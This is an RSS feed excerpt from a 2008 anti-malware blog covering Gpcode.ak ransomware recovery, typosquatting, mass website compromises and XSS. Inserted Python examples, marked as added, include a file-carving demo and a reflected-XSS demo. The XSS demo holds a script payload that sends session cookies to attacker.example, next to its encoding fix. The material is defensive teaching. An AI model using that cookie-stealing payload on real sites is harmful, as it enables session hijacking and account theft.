isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-8607873776624718121</guid><pubDate>Wed, 25 Jun 2008 15:40:00 +0000</pubDate><atom:updated>2008-06-25T17:50:51.206+02:00</atom:updated><title>Kaspersky Lab Benelux goes sailing ...</title><description>More or less without words ...&lt;br /&gt;&lt;a href="http://www.anti-malware.info/weblog/uploaded_images/2008Regatta1-717229.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://www.anti-malware.info/weblog/uploaded_images/2008Regatta1-717201.JPG" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;Each distributor got their own boat and there was a race 
between them ...&lt;br /&gt;&lt;a href="http://www.anti-malware.info/weblog/uploaded_images/2008Regatta2-798689.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://www.anti-malware.info/weblog/uploaded_images/2008Regatta2-798685.JPG" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;And DCB, our new Belgian distributor, won the race!&lt;br /&gt;&lt;a href="http://www.anti-malware.info/weblog/uploaded_images/2008Regatta3-731881.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://www.anti-malware.info/weblog/uploaded_images/2008Regatta3-731877.JPG" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;BTW I was part of the 'press boat' and took all these pictures.&lt;br /&gt;   ;-)</description><link>http://www.anti-malware.info/weblog/2008/06/kaspersky-lab-benelux-goes-sailing.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-7597631163798235587</guid><pubDate>Sun, 15 Jun 2008 14:47:00 +0000</pubDate><atom:updated>2008-06-15T17:08:04.662+02:00</atom:updated><title>GPCode.ak solution in another way ...</title><description>Currently, it's not possible to decrypt files encrypted by Gpcode.ak without the private key. However, there is a way in which encrypted files can be restored to their original condition. When encrypting a file, Gpcode.ak creates a new file next to the file it intends to encrypt, writes the encrypted version of the original's data to this new file, and then deletes the original. Deleting a file normally only removes its directory entry; the data blocks stay on disk until the file system reuses them, so a deleted file can be restored as long as those blocks have not been overwritten. Later writes, including the encrypted copies Gpcode creates for the next files, may reuse freed blocks, which is why, right from the beginning, we recommended users not to reboot their computers, but to contact us instead. We told users who contacted us to use a range of utilities to restore deleted files from disk. 
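&lt;br /&gt;&lt;br /&gt;The recovery idea above, as an added example that is not part of the original post and not the Kaspersky utility: a toy block device with a first-fit allocator (constructed here, not a real file system) on which a Gpcode-like routine writes the ciphertext to a new file and then unlinks the original; a signature carver then pulls the original back out of the freed blocks, and fails once a later write reuses them. XOR stands in for RSA, the PDF-like sample file and the key are constructed, and the block size and allocator behaviour are assumptions.

```python
"""Toy block device to show why Gpcode.ak's encrypt-to-new-file-then-delete
sequence leaves the plaintext recoverable. Constructed example: the disk,
allocator, sample PDF and XOR 'cipher' are all stand-ins, not real components."""

BLOCK = 512                      # assumed block size
KEY = b"\x5a\xa5"                # constructed key; XOR stands in for RSA-1024
SAMPLE_PDF = b"%PDF-1.4\n" + b"lorem ipsum " * 60 + b"%%EOF"   # 734 bytes, 2 blocks


def blocks_for(nbytes):
    """Ceiling division: how many blocks a payload occupies."""
    return -(-nbytes // BLOCK)


class ToyDisk:
    """Flat byte array plus a directory of name -> (first_block, length).
    unlink() only drops the directory entry and frees the bitmap bits; the
    bytes stay until a later allocation lands on them, as on FAT or NTFS."""

    def __init__(self, nblocks=64):
        self.data = bytearray(nblocks * BLOCK)
        self.free = [True] * nblocks          # allocation bitmap
        self.dirent = {}

    def _alloc(self, nblocks):
        """First-fit: lowest run of free blocks, so freed space is reused early."""
        run = 0
        for i, is_free in enumerate(self.free):
            run = run + 1 if is_free else 0
            if run == nblocks:
                start = i - nblocks + 1
                for b in range(start, start + nblocks):
                    self.free[b] = False
                return start
        raise OSError("disk full")

    def write(self, name, payload):
        start = self._alloc(blocks_for(len(payload)))
        off = start * BLOCK
        self.data[off:off + len(payload)] = payload
        self.dirent[name] = (start, len(payload))

    def read(self, name):
        start, length = self.dirent[name]
        return bytes(self.data[start * BLOCK:start * BLOCK + length])

    def unlink(self, name):
        start, length = self.dirent.pop(name)
        for b in range(start, start + blocks_for(length)):
            self.free[b] = True               # data blocks are NOT wiped


def gpcode_like_encrypt(disk, name):
    """The on-disk sequence the post describes: ciphertext goes to a NEW file
    beside the original, then the original is deleted."""
    plain = disk.read(name)
    cipher = bytes(byte ^ KEY[i % len(KEY)] for i, byte in enumerate(plain))
    disk.write(name + "._CRYPT", cipher)
    disk.unlink(name)


def carve(disk, header, trailer):
    """Signature carving over the raw device: every header..trailer span,
    linked or not, is returned. This is what undelete/recovery tools do."""
    raw = bytes(disk.data)
    found = []
    pos = raw.find(header)
    while pos != -1:
        end = raw.find(trailer, pos)
        if end == -1:
            break
        found.append(raw[pos:end + len(trailer)])
        pos = raw.find(header, end + len(trailer))
    return found


def demo():
    """Returns (carved before free space is reused, carved after)."""
    disk = ToyDisk()
    disk.write("report.pdf", SAMPLE_PDF)
    gpcode_like_encrypt(disk, "report.pdf")
    before = carve(disk, b"%PDF-", b"%%EOF")  # original still sits in freed blocks
    disk.write("notes.txt", b"x" * 1000)       # any later write may land there ...
    after = carve(disk, b"%PDF-", b"%%EOF")   # ... and then the original is gone
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("recovered before reuse:", before == [SAMPLE_PDF])
    print("recovered after reuse: ", after == [SAMPLE_PDF])
```

Run it as a script to see both outcomes. The practical lesson is the one the post gives: stop writing to the affected volume (no reboot, no installing recovery tools onto that disk) until the recovery attempt has been made, because every write is a chance to land on the freed blocks.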
Unfortunately, nearly all the available utilities are shareware – we wanted to offer an effective, accessible utility that could help restore files that had been deleted by Gpcode. Please have a look at the posting from my colleague Vitaly on Kaspersky's &lt;a href="http://www.viruslist.com/en/weblog"&gt;Viruslist&lt;/a&gt; blog from 13 June 2008.&lt;br /&gt;Kaspersky got a lot of comments and criticism, even from respected and well-known security people like &lt;a href="http://www.schneier.com/blog/"&gt;Bruce Schneier&lt;/a&gt;, &lt;a href="http://forum.kaspersky.com/index.php?showtopic=71734&amp;hl=vesselin"&gt;Vesselin Bontchev&lt;/a&gt; and others, but what none of them were looking at was the easy solution: just try to recover the files from before they were encrypted. I fully agree with them that searching for the decryption key using brute-force computing power would be very unrealistic, but still, I like at least the idea of an international cooperation between a lot of security companies ... maybe it's 'insecure' thinking from myself, if you know what I mean.    ;-)</description><link>http://www.anti-malware.info/weblog/2008/06/gpcodeak-solution-in-another-way.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-8686795217214352289</guid><pubDate>Sun, 15 Jun 2008 13:17:00 +0000</pubDate><atom:updated>2008-06-15T15:25:52.182+02:00</atom:updated><title>Typosquatting in Belgium on the rise.</title><description>Typosquatting, also called URL hijacking, is a form of cybersquatting which relies on mistakes such as typographical errors made by Internet users when typing a website address into a web browser. Should a user accidentally enter an incorrect website address, they may be led to an alternative website owned by a cybersquatter.&lt;br /&gt;It seems that we have seen a rise in typosquatting over the last few years here in Belgium. 
I was interviewed yesterday and made it into the 13:00 and 19:00 news on VTM, a well-known Belgian TV station. You can have a look at the recorded broadcast at my &lt;a href="http://www.anti-malware.info/press.htm"&gt;press page&lt;/a&gt; or via &lt;a href="http://www.wavci.com/media08/20080614_hn13_vtm.wmv"&gt;my direct link&lt;/a&gt;.</description><link>http://www.anti-malware.info/weblog/2008/06/typosquatting-in-belgium-on-rise.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-7679805036436156216</guid><pubDate>Thu, 12 Jun 2008 07:58:00 +0000</pubDate><atom:updated>2008-06-12T10:10:33.944+02:00</atom:updated><title>China hacking into US computers more realistic than China attacking Belgium!</title><description>You could read the following on the net just a few hours ago: multiple congressional computers have been hacked by people working from inside China, lawmakers said Wednesday, suggesting the Chinese were seeking lists of dissidents. You can find more at &lt;br /&gt;&lt;a href="http://news.yahoo.com/s/ap/20080611/ap_on_go_co/china_hacking"&gt;http://news.yahoo.com/s/ap/20080611/ap_on_go_co/china_hacking&lt;/a&gt;&lt;br /&gt;This is a much more realistic targeted attack, with much more evidence behind it, than what our government was claiming a month ago. I blogged about that on the 2nd of May at:&lt;br /&gt;&lt;a href="http://www.anti-malware.info/weblog/archive/2008_05_01_wavci_archive.html"&gt;http://www.anti-malware.info/weblog/archive/2008_05_01_wavci_archive.html&lt;/a&gt;&lt;br /&gt;I'm nearly 100% sure that the Belgian version was not orchestrated and that everything was just a coincidence of a lot of spammed malware reaching some of the governmental computers. 
I'm still not happy with what some members of our government told the public at the time.</description><link>http://www.anti-malware.info/weblog/2008/06/china-hacking-into-us-computers-more.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-6684428009822783749</guid><pubDate>Tue, 10 Jun 2008 09:57:00 +0000</pubDate><atom:updated>2008-06-10T12:15:50.853+02:00</atom:updated><title>Assistance needed for cracking GPCode.ak ...</title><description>Our office just launched the following press release following the recent problems with a new GPCode variant. See more at &lt;a href="http://www.viruslist.com"&gt;www.viruslist.com&lt;/a&gt; .&lt;br /&gt;&lt;br /&gt;"Kaspersky Lab announces Stop Gpcode, an international initiative against the blackmailing virus Gpcode which emerged last week. &lt;br /&gt;The objective of the initiative is to factor (‘crack’) the RSA-1024 key used in Virus.Win32.Gpcode.ak – the latest version of the dangerous Gpcode blackmailer virus. The signature for Virus.Win32.Gpcode.ak was added to Kaspersky Lab antivirus databases on June 4, 2008. &lt;br /&gt;Kaspersky Lab invites all cryptography experts, as well as governmental and research institutions, other antivirus vendors and independent researchers to join the efforts to solve this problem. The company is prepared to provide any additional information at its disposal and is open to dialogue with all experts wishing to participate in the Stop Gpcode initiative. &lt;br /&gt;To coordinate the activity of all participants of the initiative, a special &lt;a href="http://forum.kaspersky.com/index.php?showforum=90."&gt;Stop Gpcode&lt;/a&gt; forum has been created. "This is the first time in security history that such an initiative has appeared. Let us hope that this could become a good example of perfect international cooperation. 
However, we must not overestimate this possible solution: a backup in combination with optimal security and good malware protection is still the best solution for a lot of problems, also in the future," says Eddy Willems, Security Evangelist at Kaspersky Lab Benelux.&lt;br /&gt;Virus.Win32.Gpcode.ak &lt;br /&gt;Gpcode.ak encrypts files with various extensions using the RSA encryption algorithm with a 1024-bit key. After encrypting, the virus changes the extension of these files to ._CRYPT and places a text file named !_READ_ME_!.txt in the same folder. In the text file the criminal tells the victims that the file has been encrypted and offers to sell them a decryptor.&lt;br /&gt;The author of Gpcode has taken two years to improve the virus: the previous errors have been fixed and the key has been lengthened to 1024 bits instead of 660. The task of ‘cracking’ the RSA-1024 key is an extremely complicated cryptographic problem. Eddy Willems confirms this: “To crack the key at least 15 million computers have to be running for one year.”"&lt;br /&gt;&lt;br /&gt;Of course it's clear that this is just an interesting initiative, and I really hope it could be realistic in the near future, but of course it's not as easy as it seems. &lt;br /&gt;Nevertheless, such initiatives haven't been seen in the past and I think it's time that vendors worked together in a better way than before, but isn't that another, harder question? Could this be even more unrealistic? 
What do you think?</description><link>http://www.anti-malware.info/weblog/2008/06/assistance-needed-for-cracking-gpcodeak.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-5233792523138445356</guid><pubDate>Sun, 01 Jun 2008 13:00:00 +0000</pubDate><atom:updated>2008-06-01T15:09:26.425+02:00</atom:updated><title>Kaspersky Lab Benelux 5 years old!</title><description>&lt;a href="http://www.anti-malware.info/weblog/uploaded_images/30052008-181533IMG1317-797094.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://www.anti-malware.info/weblog/uploaded_images/30052008-181533IMG1317-797086.JPG" border="0" alt="" /&gt;&lt;/a&gt;This weekend we celebrated our fifth 'local office Kaspersky Lab' anniversary with a sleepover in a nice hotel in Valkenburg near Maastricht (NL). On the picture you can see all employees, including me; the picture was given to our COO Dick Gehéniau.</description><link>http://www.anti-malware.info/weblog/2008/06/kaspersky-lab-benelux-5-years-old.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-5916956210215989830</guid><pubDate>Sun, 01 Jun 2008 12:06:00 +0000</pubDate><atom:updated>2008-06-01T14:16:02.905+02:00</atom:updated><title>May 2008: Web site compromises record month!</title><description>Here are the highlights of the notable Web site compromises I have seen in the past month:&lt;br /&gt;&lt;br /&gt;May 2 - One Year Later, Italian Job Still Working Overtime&lt;br /&gt;&lt;br /&gt;It’s been a year since the infamous Italian Job attack of 2007. And in an apparent observance of its anniversary, a similar attack was seen compromising about 90 varied Italian Web sites, all hosted in Italy by a single hosting provider—the same one that hosted the thousands of sites hit in last year’s large-scale attack. 
&lt;br /&gt;&lt;br /&gt;May 7 - A Very Convoluted Chinese Gaming-Info-Stealing Campaign&lt;br /&gt;&lt;br /&gt;Approximately 9,000 Web sites were compromised via SQL injection, with embedded malicious JavaScript redirecting users to two major malicious URLs. Among these Web sites were legitimate medical, educational, government, and entertainment sites from around the world.&lt;br /&gt;&lt;br /&gt;A survey of the site locations includes India, UK, Canada, France, and China. This observation suggests the attack is the work of an automated Chinese hacktool programmed to search through Web sites for vulnerabilities, creating the same .HTML file that has been used to launch various exploits.&lt;br /&gt;&lt;br /&gt;May 10 - More of The Same: Another Half Million Web Sites Compromised&lt;br /&gt;&lt;br /&gt;Meanwhile, a malicious script was injected into half a million Web sites believed to be running either poorly implemented or older, exploitable versions of phpBB. This event involved a ZLOB Trojan, among others, which changes an affected system’s local DNS and Internet browser settings.&lt;br /&gt;&lt;br /&gt;May 19 - Chinese Weekend Compromise&lt;br /&gt;&lt;br /&gt;Chinese-language Web sites were targeted in an attack aimed specifically at China, Taiwan, Singapore, and Hong Kong. Google search results at the time of the attack showed 327,000 pages containing the malicious script tag.&lt;br /&gt;&lt;br /&gt;May 19 - More Weekend Compromises Reach Other Shores&lt;br /&gt;&lt;br /&gt;Another string of Web site compromises was discovered the following week, involving at least four Web sites of various affiliations from different countries. These were injected with a malicious JavaScript that redirects to two sites. 
Both eventually lead to their own series of redirections, and finally to the download and execution of malware: a backdoor and a Trojan, respectively.&lt;br /&gt;&lt;br /&gt;May 21 - It’s Not Over: Asian Sites Injected with Nasty Code&lt;br /&gt;&lt;br /&gt;Two days later, hundreds of thousands of Web sites were again found compromised and injected with malicious JavaScript code, some of them sites from the APAC region. Hackers had apparently conducted another massive SQL injection attack. A Google search for the malicious URL turned up 197,000 results.&lt;br /&gt;&lt;br /&gt;May 22 - Malicious Domains Found in Compromised Japanese Sites&lt;br /&gt;&lt;br /&gt;The next day, several Web sites in Japan — including a popular music download site and a music company site — were found injected with malicious code.&lt;br /&gt;&lt;br /&gt;These are the hard facts, and these developments tell us that there could indeed be a trend: cyber criminals seem to favor this type of attack over other methods. For what it’s worth, our engineers also think that mass compromises are common (or at least not as uncommon as we think); it’s just that they are either found soon enough, or they remain unnoticed and consequently unreported.&lt;br /&gt;&lt;br /&gt;And I'm not even talking about the thousands of other websites which were defaced in nearly every country of the world, even in Belgium (e.g. the VTM broadcast site) ... it's definitely not a good sign or trend. &lt;br /&gt;&lt;br /&gt;A lot of XSS methods seem to be used as well in these and many other compromises: the script tags injected into site content via SQL injection are, from the visitor's browser's point of view, stored cross-site scripting.&lt;br /&gt;&lt;br /&gt;XSS has been around for a long time; it has neither become a less attractive attack method, nor has a fool-proof solution against it been properly formulated.&lt;br /&gt;XSS vulnerabilities can cause a variety of problems for the casual web surfer. These problems range in severity from mere annoyance to complete credential compromise. 
Some XSS attacks involve disclosure of the user’s session cookies, allowing the attacker to take complete control over the victim’s session and (in effect) take over the account by hijacking the HTTP session.&lt;br /&gt;XSS attacks may also redirect the user to some other page or website, or modify the content of an HTTP session. Other damaging risks include the exposure of the victim’s files, and subsequently the installation of Trojans and other damaging malware — and to what purpose? One can only guess, because once the compromise is successful, the criminal’s next actions are open to unlimited possibility.&lt;br /&gt;An XSS attacker uses varying methods to encode the malicious script in order to be less conspicuous to users and administrators alike. There are countless variations of these attacks, and XSS payloads most commonly come in the form of embedded JavaScript. But be forewarned — any embedded active content is also a potential source of danger, including ActiveX (OLE), VBScript, Flash, and more.&lt;br /&gt;XSS issues can and do exist in the underlying Web and application servers as well. Most Web and application servers use error mechanisms to display content access error pages, such as “404 page not found” and “500 internal server error”. If these pages reflect back any information from the user’s request, such as the URL they were trying to access, without encoding it for the HTML context, they are very likely vulnerable to a reflected XSS attack.&lt;br /&gt;The probability that a website contains XSS vulnerabilities is extremely high. There are countless ways to mislead Web applications into relaying maliciously injected scripts. 
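&lt;br /&gt;&lt;br /&gt;The reflected-XSS case from the error-page paragraph above, as an added example that is not part of the original post: a minimal 404 handler that pastes the requested path into the page, beside the same handler with HTML output encoding (Python's standard html.escape). The handler, the attack URL, and the attacker.example and victim.example hosts are constructed here; the cookie-stealing script is the classic session-hijack payload the paragraph refers to.

```python
"""Reflected XSS through an error page that echoes the request URL, and the
fix: encode untrusted data for the HTML context it lands in. Constructed
example; the handler, hosts and payload are not from any real site."""
import html
from urllib.parse import quote

# The angle brackets are spelled as chr() so this snippet survives inside
# an HTML/XML feed; chr(60) is the left and chr(62) the right angle bracket.
LT, GT = chr(60), chr(62)


def tag(name, body):
    """Wrap body in an HTML element; 'name' is trusted, 'body' is whatever the caller passes."""
    return LT + name + GT + body + LT + "/" + name + GT


def not_found_vulnerable(request_path):
    """404 page that pastes the requested path straight into the HTML.
    Whatever the attacker put in the URL is now markup in the victim's browser."""
    return tag("h1", "404 page not found") + tag("p", "No such page: " + request_path)


def not_found_hardened(request_path):
    """Same page; the untrusted path is encoded for the element-body context, so
    angle brackets, ampersands and quotes become entities and cannot form tags."""
    return tag("h1", "404 page not found") + tag("p", "No such page: " + html.escape(request_path, quote=True))


# Constructed attack: a script that ships document.cookie to a host the attacker
# controls (attacker.example is hypothetical), wrapped into a non-existent path.
STEAL_COOKIE = tag("script", "new Image().src='http://attacker.example/c?'+document.cookie")
ATTACK_PATH = "/nonexistent" + STEAL_COOKIE


def attack_url(victim_host="victim.example"):
    """How the payload travels: percent-encoded in the link the victim clicks.
    The server decodes it before reflecting, so wire encoding is no protection."""
    return "http://" + victim_host + quote(ATTACK_PATH, safe="/")


def script_tags_in(markup):
    """Count raw script openers in a response: 1 means the reflected input became
    executable markup, 0 means it is inert text."""
    return markup.lower().count(LT + "script")


if __name__ == "__main__":
    print(attack_url())
    print("vulnerable:", script_tags_in(not_found_vulnerable(ATTACK_PATH)))
    print("hardened:  ", script_tags_in(not_found_hardened(ATTACK_PATH)))
```

Note what the fix is and is not: it is output encoding at the point where data meets HTML, chosen for that context (a value landing inside an attribute or a JavaScript string needs a different encoding); it is not input validation on the path, and it is not the percent-encoding on the wire, which the server strips before the page is built.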
Developers and website administrators seem to have a knack for missing these vulnerable spots in their web implementations, but finding these flaws seems to be a walk in the park for attackers, since all they need is a browser and time (time which most of us don’t have).</description><link>http://www.anti-malware.info/weblog/2008/06/may-2008-web-site-compromises-record.html</link><author>noreply@blogger.com (Eddy Willems)</author></item></channel></rss>